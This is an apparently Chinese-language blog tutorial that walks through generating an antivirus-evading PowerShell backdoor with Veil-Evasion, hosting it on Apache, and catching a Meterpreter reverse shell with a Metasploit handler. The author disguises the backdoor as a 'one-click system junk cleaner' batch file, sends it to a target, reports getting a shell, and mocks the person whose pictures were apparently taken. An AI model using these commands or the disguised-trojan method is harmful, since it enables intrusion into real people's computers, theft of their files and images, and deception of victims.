image
1、安装veil-evasion生成payload
kalilinux可以直接 apt-get install veil-evasion
这里选择第一种安装方法,一梭子子弹打下去就成这样了如图:
image
不过不要急,cd默认安装路径/usr/share/veil-evasion/下,执行./ Veil-Evasion会提示你安装,默认情况下安装会爆很多错,执行此命令m -rf /root/.config/wine/veil 和 re-run: /usr/share/veil-evasion/setup/setup.sh -c解决
image
image
选择list选择一个payload,选择24,我们选择powershell,因为这玩意免杀效果好,生成bat文件命令:use 24 如图:
image
设置一下Lhost lport 即可,根据自己的需要来设置,然后执行 generate然后生成payload,会提示输入一个名称,随便输入一个
image
下面我们启动apache2然后把后门复制到/var/www/html目录下载。。
2、伪装后门利用metasploit弹回shell
命令: use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 1.1.1.1
set lport 7766
set ExitOnSession false
exploit -j
然后我把生成的bat文件修改为一键超速清理系统垃圾.bat发给目标,然后不一会shell谈回来了,
下面是获取到的一些图片:
image
尼玛长的有些像菲律宾人,太对不起观众了哈哈各位就一个简单直白的渗透思路,大家凑合的看吧,让大家见笑了!
网友评论